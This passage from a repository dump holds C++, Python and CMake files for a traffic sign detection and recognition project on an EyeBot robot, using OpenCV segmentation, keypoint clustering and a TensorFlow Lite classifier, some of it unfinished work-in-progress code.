confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n };\n \n class Detection_Profile {\n public:\n int x,y;\n int xs,ys;\n double reliability;\n std::list<Detection *> detections;\n int num_detections;\n \n int life_counter;\n \n Detection_Profile() {}\n \n void update_profile() {\n double tmp = pow(2.0, double(num_detections) );\n life_counter = int(tmp);\n \n }\n \n void tick_tock() {\n life_counter--;\n }\n \n void add_detection(Detection* d) {\n this->detections.push_back(d);\n num_detections++;\n update_profile();\n }\n \n };\n}\n" }, { "alpha_fraction": 0.8039867281913757, "alphanum_fraction": 0.8039867281913757, "avg_line_length": 29.100000381469727, "blob_id": "f866fc1b4154d72385caa7deaf3b7a8a7149962c", "content_id": "e69b08599e801a130ab6c1d38ffeeeecb19f88c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 301, "license_type": "no_license", "max_line_length": 83, "num_lines": 10, "path": "/clusterbased-build/CMakeFiles/TrafficSignRecognition.dir/cmake_clean.cmake", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"CMakeFiles/TrafficSignRecognition.dir/tsr.cpp.o\"\n \"TrafficSignRecognition.pdb\"\n \"TrafficSignRecognition\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/TrafficSignRecognition.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.7382352948188782, "alphanum_fraction": 0.7441176176071167, "avg_line_length": 29.81818199157715, "blob_id": "3d4c94eda7f44ef282df40aaaf997dc03b9713a3", "content_id": "dbb38e0d7cf2404a98d91eafffaf6fed394d2e6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 98, "num_lines": 11, "path": "/clusterbased-build/tf_files/tflite_converter.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport tensorflow.compat.v1 as tf\n\n\ninput_arrays = [\"input\"]\noutput_arrays = [\"final_result\"]\ngraph_def_file = 
\"./saved_model.pb\"\nconverter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays)\ntflite_model = converter.convert()\nopen(\"model.lite\", \"wb\").write(tflite_model)\n\n" }, { "alpha_fraction": 0.5356045961380005, "alphanum_fraction": 0.5576838850975037, "avg_line_length": 27.615062713623047, "blob_id": "761e17d32f8e62b18a34e741121cf7a78f08d60d", "content_id": "966f4b929b433b23ddc0e16d357232bac53187ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 13678, "license_type": "no_license", "max_line_length": 124, "num_lines": 478, "path": "/clusterbased/backup/tsr.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#include <Python.h>\n#include <opencv2/opencv.hpp>\n#include \"eyebot++.h\"\n#include \"TSDR.hpp\"\n\n#include <cstdio>\n#include <string>\n#include <chrono>\n#include <vector>\n#include <algorithm>\n#include <cmath>\n#include <iostream>\n#include <fstream>\n\nusing namespace cv;\nusing namespace std;\nusing namespace chrono;\nusing namespace TSDR;\n\n#define RESOLUTION QVGA\n#define SIZE QVGA_SIZE\n#define PIXELS QVGA_PIXELS\n#define WIDTH QVGA_X\n#define HEIGHT QVGA_Y\n#define MAX_LABELS 20\n#define FREQ1 15//15\n#define NO_HUE 255\n\n#define FOREGROUND 1\n#define BACKGROUND 0\n\n#define ELEMENT_SHAPE MORPH_ELLIPSE//MORPH_RECT\n#define EROSION_SIZE 1\n#define EROSION_ITERATIONS 1\n#define DILATION_SIZE 3//6\n#define DILATION_ITERATIONS 2//1\n\n#define ROI_FROM_BLOB_SIZE 0\n#define TRACKING_DISTANCE_THRESHOLD 35\n\n#define MAX_CLASSIFICATIONS_PER_FRAME 1\n#define KEYPOINT_RADII 5\n\n#define DETECTION_THRESHOLD 5 // number of keypoints in cluster before it is recorded as an ROI\n\nvoid Program_Initialisation();\nint Python_Initialisation();\nvoid generateSessionID();\nvoid read_labels();\nvoid traffic_sign_detection();\nvoid RGB2HSI(BYTE* rgb, BYTE* hsi);\nvoid HSI2BIN(BYTE* hsi, BYTE* bin);\nvoid Dilation(Mat *InputArray, Mat *OutputArray);\nvoid Erosion(Mat *InputArray, Mat *OutputArray);\nvoid showROIs(list<ROI>* ROIs);\nvoid detectClusters(vector<Cluster>* clusters);\nvoid detectROIs(list<ROI>* ROIs, vector<Cluster*>* clusters);\nvoid classification(list<ROI>* ROIs, list<Detection>* detections);\nvoid show_detections(list<Detection>* detections);\n\nBYTE rgb[SIZE];\nBYTE hsi[SIZE];\nBYTE bin[PIXELS];\nBYTE mask[PIXELS];\n\nMat rgbMat;\nMat hsiMat;\nMat binMat;\nMat maskMat;\n\nlist <Detection> detections;\n\nvector <string> labels;\n\nMat cc_labelImage;\nMat cc_stats;\nMat cc_centroids;\n\nPyObject *pModule, *pFunc;\n\nchar sessionID[15];\nint num = 0;\n\nint colourmap[] = {LIGHTGRAY, CYAN, MAGENTA, ORANGE, RED, BLUE, PURPLE,\n MAROON, YELLOW, TEAL, NAVY, OLIVE, GREEN,\n SILVER, GRAY, DARKGRAY};\n\nint main() {\n LCDSetPrintf(0,0, \"[PLEASE WAIT]\");\n \n Program_Initialisation();\n int py_error = Python_Initialisation();\n if(py_error!=0) return py_error;\n \n LCDMenu(\"\",\"\",\"\",\"END\");\n \n while(1) {\n static high_resolution_clock::time_point tc;\n tc = high_resolution_clock::now();\n \n CAMGet(rgb);\n \n /* non-interupt timer 1 */\n static high_resolution_clock::time_point t1 = high_resolution_clock::now();\n static float td_1;\n td_1 = (duration_cast<duration<double> >(tc-t1)).count();\n if( 1000/FREQ1 < 1000*td_1) {\n traffic_sign_detection();\n t1 = high_resolution_clock::now();\n }\n \n /* io */\n static int key;\n key = KEYRead();\n if(key == KEY4) break;\n }\n \n CAMRelease();\n \n Py_XDECREF(pFunc);\n Py_DECREF(pModule);\n \n if 
(Py_FinalizeEx() < 0) {\n return 1;\n }\n \n return 0;\n}\n\nvoid Program_Initialisation() {\n read_labels();\n generateSessionID();\n CAMInit(RESOLUTION);\n\n binMat = Mat(HEIGHT,WIDTH, CV_8UC1, bin);\n maskMat = Mat(HEIGHT,WIDTH, CV_8UC1, mask);\n rgbMat = Mat(HEIGHT, WIDTH, CV_8UC3, rgb);\n}\n\nint Python_Initialisation() {\n char *app_name = (char *)\"EyeBot Traffic Sign Recognition and Detection\";\n Py_SetProgramName((wchar_t*)app_name);\n Py_Initialize();\n \n PyRun_SimpleString(\"import sys\");\n PyRun_SimpleString(\"sys.path.append(\\\"./scripts/\\\")\");\n \n PyObject *pName = PyUnicode_FromString(\"label\");\n pModule = PyImport_Import(pName);\n Py_DECREF(pName);\n \n if(pModule==NULL) {\n PyErr_Print();\n Py_DECREF(pModule);\n return -1;\n }\n \n pFunc = PyObject_GetAttrString(pModule, \"label\");\n if(!pFunc || !PyCallable_Check(pFunc)) {\n if (PyErr_Occurred()) PyErr_Print();\n Py_XDECREF(pFunc);\n Py_DECREF(pModule);\n return -1;\n }\n \n return 0;\n}\n\n\nvoid generateSessionID()\n{ time_t rawtime;\n struct tm * timeinfo;\n time (&rawtime);\n timeinfo = localtime (&rawtime);\n strftime(sessionID, 15, \"%G%m%d%H%M%S\", timeinfo);\n}\n\nvoid read_labels() {\n ifstream f;\n f.open(\"tf_files/labels.txt\");\n while(!f.eof()) {\n string s;\n getline(f,s);\n labels.push_back(s);\n }\n f.close();\n return;\n}\n\nvoid Dilation(Mat *InputArray, Mat *OutputArray) {\n static Mat element = getStructuringElement( ELEMENT_SHAPE,\n Size( 2*DILATION_SIZE + 1, 2*DILATION_SIZE + 1 ),\n Point( DILATION_SIZE, DILATION_SIZE ) );\n dilate(*InputArray, *OutputArray, element, Point(-1,-1), DILATION_ITERATIONS);\n}\n\nvoid Erosion(Mat *InputArray, Mat *OutputArray) {\n static Mat element = getStructuringElement( ELEMENT_SHAPE,\n Size( 2*EROSION_SIZE + 1, 2*EROSION_SIZE + 1 ),\n Point( EROSION_SIZE, EROSION_SIZE ) );\n erode(*InputArray, *OutputArray, element, Point(-1,-1), EROSION_ITERATIONS);\n}\n\nvoid showROIs(list<ROI>* ROIs) {\n list<ROI>::iterator it;\n for (it = ROIs->begin(); it != ROIs->end(); it++) {\n int x = it->x;\n int y = it->y;\n int xs = it->xs;\n int ys = it->ys;\n LCDArea(x,y,x+xs,y+ys,GREEN,0);\n }\n return;\n}\n\nvoid trackDetections(list<ROI>* ROIs, list<Detection>* detections) {\n list<Detection>::iterator it1;\n for (it1=detections->begin(); it1!=detections->end();it1++) {\n list<ROI>::iterator it2;\n for(it2=ROIs->begin();it2!=ROIs->end();it2++) {\n int it1_xc = it1->x + it1->xs/2;\n int it1_yc = it1->y + it1->ys/2;\n int it2_xc = it2->x + it2->xs/2;\n int it2_yc = it2->y + it2->ys/2;\n \n int dx = it1_xc-it2_xc;\n int dy = it1_yc-it2_yc;\n \n int dist = sqrt(dx*dx+dy*dy);\n if(dist < TRACKING_DISTANCE_THRESHOLD) {\n \n it1->x = it2->x;\n it1->y = it2->y;\n it1->xs = it2->xs;\n it1->ys = it2->ys;\n\n ROIs->erase(it2);\n break;\n }\n }\n // if it has reached this point, it cannot be tracked\n if( it2==ROIs->end() ) {\n it1 = detections->erase(it1);\n it1--;\n }\n }\n return;\n \n}\n\nvoid detectClusters(vector<Cluster*>* clusters) {\n RGB2HSI(rgb, hsi);\n HSI2BIN(hsi,bin);\n Erosion(&binMat, &maskMat);\n Dilation(&maskMat, &maskMat);\n \n int nLabels = connectedComponentsWithStats(maskMat, cc_labelImage, cc_stats, cc_centroids, 8);\n \n for(int i = 1; i<nLabels; i++) {\n int x = cc_stats.at<int>(Point(0, i));\n int y = cc_stats.at<int>(Point(1, i));\n int w = cc_stats.at<int>(Point(2, i));\n int h = cc_stats.at<int>(Point(3, i));\n Cluster c = Cluster(i,x,y,w,h);\n clusters->push_back(&c);\n }\n \n static vector<KeyPoint> keypoints;\n static vector<int> keypoint_indexes;\n 
static Mat image = Mat(HEIGHT,WIDTH, CV_8UC3, rgb);\n \n //static Ptr<ORB> detector = ORB::create();\n static Ptr<FastFeatureDetector> detector = FastFeatureDetector::create();\n \n static Mat t_mask = Mat::zeros(HEIGHT,WIDTH,CV_8U);\n t_mask(Rect(0,0,WIDTH,HEIGHT)) = 1;\n detector->detect(image, keypoints, t_mask);\n \n // to display keypoints\n /*\n vector<KeyPoint>::iterator it;\n for(it=keypoints.begin(); it!=keypoints.end(); ++it) {\n int x = (int) it->pt.x;\n int y = (int) it->pt.y;\n int label = cc_labelImage.at<int>(y, x);\n LCDCircle(x, y, KEYPOINT_RADII, colourmap[label], 0);\n }\n */\n vector<KeyPoint>::iterator it3;\n for(it3=keypoints.begin(); it3!=keypoints.end(); ++it3) {\n int x = (int) it3->pt.x;\n int y = (int) it3->pt.y;\n int label = cc_labelImage.at<int>(y, x);\n if(label!=0) {\n //Cluster c = clusters[label-1];\n clusters->at(label-1)->add_keypoint(*it3);\n //*clusters[label-1].add_keypoint(*it3);\n }\n }\n \n}\n\nvoid detectROIs(list<ROI> *ROIs, vector<Cluster*> *clusters) {\n for(int i=0; i<int(clusters.size()); i++) {\n if(clusters->at[i]->n >= DETECTION_THRESHOLD) {\n int x,y,xs,ys;\n \n if(ROI_FROM_BLOB_SIZE) {\n x = clusters[i].x;\n y = clusters[i].y;\n xs = clusters[i].w;\n ys = clusters[i].h;\n }\n else {\n x = clusters[i].kp_xmin;\n y = clusters[i].kp_ymin;\n xs = clusters[i].kp_xmax - clusters[i].kp_xmin;\n ys = clusters[i].kp_ymax - clusters[i].kp_ymin;\n }\n int priority = clusters[i-1].n;\n \n ROI r = ROI(x,y,xs,ys,priority );\n ROIs->push_back(r);\n }\n }\n\n // sort ROIs\n ROIs->sort(compareROIs);\n return;\n}\n\nvoid traffic_sign_detection() {\n /*\n 1. detect ROIs (input: rgb image; output: list of ROIs\n 2. perform non-maxima suppression\n 3. track existant detections\n 4. choose highest-priority ROI to classify\n 5. perform classification and return new detection\n 6. 
display detections\n */\n LCDImageStart(0,0,WIDTH,HEIGHT);\n LCDImage(rgb);\n //LCDImageStart(0,0,WIDTH,HEIGHT);\n //LCDImageBinary(mask);\n \n static high_resolution_clock::time_point t1;\n t1 = high_resolution_clock::now();\n \n vector<Cluster> clusters;\n list<ROI> ROIs;\n \n detectClusters(&clusters);\n detectROIs(&ROIs, &clusters);\n //trackDetections(&ROIs, &detections);\n showROIs(&ROIs);\n //classification(&ROIs, &detections);\n //show_detections(&detections);\n \n static high_resolution_clock::time_point t2;\n t2 = high_resolution_clock::now();\n static float td;\n td = (duration_cast<duration<double> >(t2-t1)).count();\n \n printf(\"td: %f\\n\", td);\n return;\n}\n\nvoid RGB2HSI(BYTE* rgb, BYTE* hsi)\n{ int i;\n for(i=0; i<PIXELS; i++)\n { int r,g,b,max,min,delta;\n BYTE hue = 0;\n r=rgb[3*i];\n g=rgb[3*i+1];\n b=rgb[3*i+2];\n \n max = MAX(r,MAX(g,b));\n min = MIN(r,MIN(g,b));\n delta = max - min;\n \n if (2*delta <= max) hue = NO_HUE;\n else\n {\n if (r==max) hue = 42 + 42*int(double(g-b)/double(delta));\n else if (g==max) hue = 126 + 42*int(double(b-r)/double(delta));\n else if (b==max) hue = 210 + 42*int(double(r-g)/double(delta));\n }\n \n hsi[3*i] = hue;\n if(max==0) hsi[3*i+1] = 0;\n else hsi[3*i+1] = 255 - 3*int(255.0*double(min)/double(r+g+b));\n hsi[3*i+2]= (r+g+b)/3;\n }\n}\n\nvoid HSI2BIN(BYTE* hsi, BYTE* bin)\n{ int i;\n int hue, saturation, intensity;\n for(i=0; i<PIXELS; i++)\n { hue = hsi[3*i];\n saturation = hsi[3*i+1];\n intensity = hsi[3*i+2];\n \n bin[i] = BACKGROUND;\n //if( ((0<=hue&&hue<=25)||(325<=hue&&hue<=360))&&(saturation>=50)&&(intensity>25) ) bin[i] = 0; // stop signs\n if( ((0<=hue&&hue<=45)||(325<=hue&&hue<=360))&&(saturation>=50)&&(intensity>25) ) bin[i] = FOREGROUND; // stop signs\n else if( (35<=intensity&&intensity<=75)&&(180<=hue&&hue<=250) ) bin[i] = FOREGROUND; // parking\n else if ( (intensity>130)&&(saturation<=50) ) bin[i] = FOREGROUND; //white\n }\n}\n\nvoid classification(list<ROI>* ROIs, list<Detection>* detections) {\n for(int i=0; i< MAX_CLASSIFICATIONS_PER_FRAME; i++) {\n int index;\n double confidence;\n \n if(ROIs->empty()) return;\n ROI *roi = &ROIs->front();\n\n PyObject *pArgs = PyTuple_New(5);\n char *img_data = (char *)rgbMat.data;\n \n int len = SIZE;\n \n PyObject *pValue1 = PyMemoryView_FromMemory(img_data,len,PyBUF_READ);\n if (!pValue1) {\n Py_XDECREF(pValue1);\n Py_DECREF(pArgs);\n Py_DECREF(pModule);\n fprintf(stderr, \"Cannot convert argument\\n\");\n return;\n }\n PyTuple_SetItem(pArgs, 0, pValue1);\n PyTuple_SetItem(pArgs, 1, PyLong_FromLong(roi->x)); // set x\n PyTuple_SetItem(pArgs, 2, PyLong_FromLong(roi->y)); // set y\n PyTuple_SetItem(pArgs, 3, PyLong_FromLong(roi->xs)); // set xs\n PyTuple_SetItem(pArgs, 4, PyLong_FromLong(roi->ys)); // set ys\n\n PyObject *pValue2 = PyObject_CallObject(pFunc, pArgs);\n if (pValue2 != NULL) {\n index = int(PyLong_AsLong(PyTuple_GetItem(pValue2,0)));\n confidence = PyFloat_AsDouble(PyTuple_GetItem(pValue2,1));\n Py_XDECREF(pValue2);\n }\n else {\n Py_XDECREF(pValue2);\n PyErr_Print();\n fprintf(stderr,\"Call failed\\n\");\n return;\n }\n \n Detection observed(index, confidence,roi->x,roi->y,roi->xs,roi->ys );\n detections->push_back(observed);\n \n ROIs->pop_front();\n }\n \n return;\n}\n\nvoid show_detections(list<Detection>* detections) {\n list<Detection>::iterator it1;\n for (it1=detections->begin(); it1!=detections->end();it1++) {\n if(it1->object_class==0) continue;\n \n const static float X_M= 0.18;\n const static float X_C= -2.3;\n const static float Y_M= 0.06;\n const 
static float Y_C= 1.4;\n \n LCDArea(it1->x,it1->y,it1->x+it1->xs-1,it1->y+it1->ys-1,YELLOW,0);\n \n LCDSetPos(Y_M*it1->y+Y_C,X_M*it1->x+X_C);\n LCDPrintf(\"%s:%f\",labels[it1->object_class].c_str(),it1->confidence);\n }\n \n return;\n}\n" }, { "alpha_fraction": 0.6761193871498108, "alphanum_fraction": 0.6955223679542542, "avg_line_length": 24.417720794677734, "blob_id": "71fdaa6276b4442283f73dd913c863a570769763", "content_id": "3ec869c0ad6dca60ee78236a95bbdb015ddab90e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "no_license", "max_line_length": 71, "num_lines": 79, "path": "/LEGACY/fromRobot/ORB_DETECTION-build/scripts/label.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "\n\nimport numpy as np\nimport tensorflow as tf\n#import cv2\n#print(\"here1\")\n#print(\"here1\")\n#print(\"here1\")\n\n#tf.enable_eager_execution()\n#tf.enable_eager_execution()\n#tf.compat.v1.enable_eager_execution\ntf.enable_eager_execution()\nmodel_path = \"tf_files/graph.lite\"\nprint(tf.__version__)\n \n# Load TFLite model and allocate tensors.\n#interpreter = tf.lite.Interpreter(model_path=model_path)\n\n#interpreter = tf.lite.Interpreter(model_path=path)\ninterpreter = tf.contrib.lite.Interpreter(model_path=model_path)\nprint(\"here\")\ninterpreter.allocate_tensors()\n\n \n# Get input and output tensors.\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\ninput = interpreter.tensor(input_details[0][\"index\"])\noutput = interpreter.tensor(output_details[0][\"index\"])\n\nmean = 128\nstd_dev = 127\n\nheight = input_details[0]['shape'][1]\nwidth = input_details[0]['shape'][2]\n\nfloating_model = False\nif input_details[0]['dtype'] == type(np.float32(1.0)):\n floating_model = True\n\n\ndef label(img_data,img_height, img_width):\n #print(img_height)\n #print(img_width)\n image = np.asarray(img_data,dtype=\"uint8\")\n image = np.reshape(image, (1,img_height, img_width, 3))\n \n #cv2.imwrite(\"image.jpg\", image)\n #cv2.waitKey(0)\n\n if floating_model:\n #print(\"floating model\")\n image = np.float32(image)\n image = (image - mean) / std_dev\n \n \n interpreter.set_tensor(input_details[0]['index'], image)\n interpreter.invoke()\n\n\n#print(\"hello-1\")\n #output_tensor = interpreter.get_tensor(output_details[0]['index'])\n\n#print(output_tensor)\n\n#predictions = np.squeeze(output_tensor)\n predictions = np.squeeze(output()[0])\n#print(predictions)\n predicted_confidence = max(predictions)\n#print(\"hello0\")\n object_class = np.where(predictions==predicted_confidence)\n\n#print(\"hello1\")\n object_class = object_class[0][0]\n#print(\"hello2\")\n\n#print(object_class)\n#print(predicted_confidence)\n return (object_class, predicted_confidence)\n" }, { "alpha_fraction": 0.5955414175987244, "alphanum_fraction": 0.615180492401123, "avg_line_length": 31.482759475708008, "blob_id": "3b2307ff722570577cef12fd1d778139e4f582aa", "content_id": "5aa14a6661550d19d3bb12b887d57f9c6937d8bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1884, "license_type": "no_license", "max_line_length": 80, "num_lines": 58, "path": "/LEGACY/fromRobot/ORB_DETECTION-build/scripts/backup/label.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "# Copyright 2017 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nif __name__ == \"__main__\":\n\n file_path = \"tmp/1.jpg\"\n height = input_details[0]['shape'][1]\n width = input_details[0]['shape'][2]\n img = cv2.imread(file_path)\n resized = cv2.resize(img, (width, height))\n \n floating_model = False\n \n if input_details[0]['dtype'] == type(np.float32(1.0)):\n floating_model = True\n\n # add N dim\n input_data = np.expand_dims(resized, axis=0)\n\n input_data = np.float32(input_data)\n\n if floating_model:\n input_data = (np.float32(input_data) - input_mean) / input_std\n \n interpreter.set_tensor(input_details[0]['index'], input_data)\n \n interpreter.invoke()\n \n \n output_data = interpreter.get_tensor(output_details[0]['index'])\n#print(\"inference %s\" % output_data)\n \n \n start = time.time()\n \n output_data = interpreter.get_tensor(output_details[0]['index'])\n \n # removes signle-dimension entries from shape of array\n # the shape of the input tensor is [1 128 128 3]\n results = np.squeeze(output_data)\n \n print labels\n print results\n \n end=time.time()\n print('\\nLABEL: {:.5f} seconds'.format(end-start))\n" }, { "alpha_fraction": 0.4172859787940979, "alphanum_fraction": 0.4243049919605255, "avg_line_length": 28.06399917602539, "blob_id": "e7c076da265c413c373cded04e1f37f19dcd5165", "content_id": "6298736aae9dd8671e81a06f61654be1714efe1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7266, "license_type": "no_license", "max_line_length": 118, "num_lines": 250, "path": "/clusterbased/TSDR.hpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#define MAX_DETECTIONS 50\n#define MAX_LABELS 20\n#define E_CONST 2.71828\n\n#define ALPHA 2.0\n#define BETA 1.0\n\nnamespace TSDR\n{\n class Cluster {\n public:\n int id;\n int x, y, w, h;\n int n; // number of keypoints in cluster\n \n int kp_xmin, kp_ymin;\n int kp_xmax, kp_ymax;\n \n std::list<cv::KeyPoint> associated;\n \n Cluster () {}\n\n void add_keypoint(cv::KeyPoint kp) {\n this->associated.push_back(kp);\n this->n++;\n int x = int(kp.pt.x);\n int y = int(kp.pt.y);\n if(x<this->kp_xmin) this->kp_xmin=x;\n else if(x>this->kp_xmax) this->kp_xmax=x;\n if(y<this->kp_ymin) this->kp_ymin=y;\n else if(y>this->kp_ymax) this->kp_ymax=y;\n }\n \n Cluster(int id, int x, int y, int w, int h) {\n this->id = id;\n this->x = x;\n this->y = y;\n this->w = w;\n this->h = h;\n \n kp_xmin=INT_MAX;\n kp_xmax=0;\n kp_ymin=INT_MAX;\n kp_ymax=0;\n }\n \n };\n \n class ROI {\n public:\n int x, y; // x, y coords of top left corner\n int xs, ys; // width, height respectively\n int priority;\n Cluster *cluster;\n int tag = -1;\n \n ROI (int x, int y, int xs, int ys) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n \n ROI (int x, int y, int xs, int ys, int priority) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = 
priority;\n }\n \n ROI (int x, int y, int xs, int ys, int priority, Cluster *cluster) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n this->cluster = cluster;\n }\n };\n bool compareROIs (ROI a, ROI b) { return a.priority>b.priority; }\n \n class Detection {\n public:\n int object_class;\n double confidence;\n int x,y; // x,y coords of top left corner\n int xs,ys; // width, height respectively\n Cluster* associated_cluster;\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys, Cluster *cluster) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->associated_cluster = cluster;\n }\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n };\n \n class Detection_Profile {\n public:\n // current location\n int x,y;\n int xs,ys;\n \n double reliability;\n int predicted_class;\n \n double data[MAX_LABELS][MAX_DETECTIONS] = {{0.0}};\n \n double reliability_array[MAX_LABELS] = {0.0};\n double softmaxReliability_array[MAX_LABELS] = {0.0};\n \n std::list<Detection*> detections;\n int N_d = 0; // number of times detected\n int ticks_left; // time until it will need to be detected again\n \n void setCounter() {\n ticks_left = int(pow(2,N_d));\n }\n void tick() {\n ticks_left--;\n }\n \n void predict() {\n int i = 0;\n int max_pos = -1;\n double max_val = -1.0;\n \n for(i=0; i< MAX_LABELS; i++) {\n if(softmaxReliability_array[i] > max_val ) {\n max_pos = i;\n max_val = softmaxReliability_array[i];\n }\n }\n \n this->reliability = max_val;\n this->predicted_class = max_pos;\n }\n \n void setReliabilityArray() {\n int i;\n for(i=0; i<MAX_LABELS; i++) {\n int j;\n int n = 0;\n double R = 1.0;\n for(j=0; j< MAX_DETECTIONS; j++) {\n if(j!=0) {\n n++;\n R = R*(1.0-data[i][j]);\n }\n }\n R = 1.0-R;\n reliability_array[i] =(1.0-pow(ALPHA, -BETA*double(n)))*R;\n }\n \n return;\n }\n \n void setSoftmaxArray() {\n int i;\n \n double denominator = 0.0;\n for(i=0; i< MAX_LABELS; i++) {\n if(reliability_array[i]!=0)\n denominator += pow(E_CONST, reliability_array[i]);\n }\n \n for(i=0; i< MAX_LABELS; i++) {\n if(reliability_array[i]!=0)\n softmaxReliability_array[i] = reliability_array[i]*pow(E_CONST, reliability_array[i])/denominator;\n }\n return;\n }\n \n \n void add_detection(Detection* _detection) {\n if(N_d>=MAX_DETECTIONS) return; // laziest thing I have done, but it should work\n this->x = _detection->x;\n this->y = _detection->y;\n this->xs = _detection->xs;\n this->ys = _detection->ys;\n \n this->detections.push_back(_detection);\n \n int object_class = _detection->object_class;\n double confidence = _detection->confidence;\n \n printf(\"class=%d, conf=%f\\n\", object_class, confidence);\n data[object_class][N_d] = confidence;\n \n N_d++;\n setCounter();\n setReliabilityArray();\n setSoftmaxArray();\n predict();\n }\n \n Detection_Profile(Detection* _detection) {\n this->x = _detection->x;\n this->y = _detection->y;\n this->xs = _detection->xs;\n this->ys = _detection->ys;\n this->detections.push_back(_detection);\n \n int object_class = _detection->object_class;\n double confidence = _detection->confidence;\n \n \n printf(\"class=%d, conf=%f\\n\", object_class, confidence);\n data[object_class][N_d] = confidence;\n \n N_d++;\n setCounter();\n setReliabilityArray();\n 
setSoftmaxArray();\n predict();\n }\n \n void printTable() {\n int i,j;\n /*\n for(j=0; j< MAX_DETECTIONS; j++) {\n for(i=0; i<MAX_LABELS; i++) {\n printf(\"%f, \", data[i][j]);\n }\n \n printf(\"\\n\"); }\n\n return;\n */\n for(i=0; i<MAX_LABELS; i++) {\n //printf(\"%f, \",reliability_array[i]);\n printf(\"%f, \", softmaxReliability_array[i]);\n }\n printf(\"\\n\");\n }\n };\n}\n" }, { "alpha_fraction": 0.5320630073547363, "alphanum_fraction": 0.5549852252006531, "avg_line_length": 26.996063232421875, "blob_id": "de68a26ade5aa4b5aca247b71b76acaf566c50e8", "content_id": "bf1b9910101e8441bdba61241d9761ffb7c0a157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 14222, "license_type": "no_license", "max_line_length": 131, "num_lines": 508, "path": "/LEGACY/fromRobot/ORB_DETECTION/detector.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#include <opencv2/opencv.hpp>\n#include \"eyebot++.h\"\n#include <Python.h>\n#include <string>\n#include <chrono>\n#include <stdio.h>\n#include <vector>\n#include <algorithm> // for max and min\n#include <cmath>\n\n#include <iostream>\n#include <fstream>\n\n//#include <numpy/arrayobject.h>\n\n#include \"TSDR.cpp\"\n\n#define RESOLUTION QVGA\n#define SIZE QVGA_SIZE\n#define PIXELS QVGA_PIXELS\n#define WIDTH QVGA_X\n#define HEIGHT QVGA_Y\n\n#define MAX_LABELS 20\n\n#define FREQ1 15 /* in Hz */\n\nusing namespace cv;\nusing namespace std;\nusing namespace chrono;\nusing namespace TSDR;\n\nBYTE rgb[SIZE];\nvector <string> labels;\n\nPyObject *pModule, *pFunc;\n//PyObject *pArgs, *pValue1, *pValue2;\n\nchar sessionID[15];\nint num = 0;\n\nbool my_compare (ROI a, ROI b)\n{\n return a.priority > b.priority;\n}\n\nvoid generateSessionID()\n{ time_t rawtime;\n struct tm * timeinfo;\n time (&rawtime);\n timeinfo = localtime (&rawtime);\n strftime(sessionID, 15, \"%G%m%d%H%M%S\", timeinfo);\n}\n\nvoid detectROIs(list<ROI>& rois) {\n \n //static Mat grey;\n static vector<KeyPoint> keypoints;\n static vector<int> keypoint_indexes;\n static Mat image = cv::Mat(HEIGHT,WIDTH, CV_8UC3, rgb);\n //cv::cvtColor(image, grey, CV_RGB2GRAY);\n \n \n \n //static Ptr<FeatureDetector> detector = FeatureDetector::create(\"ORB\");\n static Ptr<ORB> detector = ORB::create();\n \n //detector->detect(image, keypoints, Mat());\n \n static Mat mask = Mat::zeros(HEIGHT,WIDTH,CV_8U);\n mask(Rect(0,0,WIDTH,HEIGHT*0.8))=1;\n \n detector->detect(image, keypoints, mask);\n \n \n Mat image_keypoints = image.clone();\n \n //drawKeypoints(image, keypoints, image,Scalar(255,153,255), DrawMatchesFlags::DEFAULT );\n drawKeypoints(image, keypoints, image_keypoints,Scalar(255,153,255), DrawMatchesFlags::DEFAULT );\n \n vector<Point2f> points;\n KeyPoint::convert(keypoints, points, keypoint_indexes);\n \n static const int WINDOW_SIZE = 90;//32;\n static const int THRESHOLD = 5;//24;\n static const int STEP_SIZE = 16;\n \n // this can be optimised further\n int i,j;\n for(i=0; i<WIDTH-WINDOW_SIZE;i=i+STEP_SIZE) {\n for(j=0; j<HEIGHT-WINDOW_SIZE; j=j+STEP_SIZE) {\n int density = 